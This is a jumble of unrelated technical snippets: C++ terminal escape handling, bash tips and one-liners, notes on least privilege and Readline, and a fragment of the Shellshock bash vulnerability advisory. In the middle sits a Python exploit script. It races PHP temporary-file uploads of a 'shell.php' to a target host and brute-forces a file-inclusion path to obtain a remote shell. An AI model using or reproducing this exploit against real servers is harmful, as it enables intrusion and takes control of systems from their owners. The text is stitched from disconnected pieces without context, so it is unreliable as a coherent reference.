// scroll down a bit to avoid visual glitch when the screen
// area shrinks by one row
std::cout << "\n";
// save cursor
std::cout << "\0337";
// set scroll region (this will place the cursor in the top left)
std::cout << "\033[0;" << std::to_string(nr_rows - 1) << "r";
// restore cursor but ensure it's inside the scrolling area
std::cout << "\0338";
static const char *move_cursor_up = "\033[1A";
std::cout << move_cursor_up;
printf >&2 '%s: reading from stdin...' "$(basename "$0")"
stdin=$(cat <&0)
printf >&2 '\r\033[0K'
echo "$stdin"
import itertools
import requests
import string
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
    requests.post('http://target.com/index.php?c=index.php', f)

print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
    # combinations() yields tuples of characters; join them into a string
    url = 'http://target.com/index.php?c=/tmp/php' + ''.join(fname)
    r = requests.get(url)
    if 'load average' in r.text:  # <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)

print('[x] Something went wrong, please try again')
The Principle of Least Privilege says that software shouldn't be executed with more authority than it needs to get its job done. Unfortunately, following this principle is hard; most operating systems are configured so that the scripts and programs you run can do anything you can.
Although the Readline library comes with a set of default keybindings, it is possible to modify these by putting commands into a .inputrc file, typically in the home directory. The name of this file is taken from the value of the shell variable INPUTRC. If that variable is unset, the default is ~/.inputrc. If that file does not exist or cannot be read, the ultimate default is /etc/inputrc.
Stephane Chazelas discovered a vulnerability in bash, related to how
environment variables are processed: trailing code in function
definitions was executed, independent of the variable name.
In many common configurations, this vulnerability is exploitable over
the network.
Some stuff on bash programming
echo $(printf %08X 256 | grep -o .. | tac | tr -d '\n')
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
for i in $(pidof python); do cat /proc/$i/cmdline | tr "\0" " " | sed "s/$/ $i\n/"; done
Check if stdout is a tty, from different languages.
Lots of useful bash scripting tips:
$? exit status of the last command (${PIPESTATUS} for pipelined commands)
avoid temporary files:
diff <(wget -O - url1) <(wget -O - url2)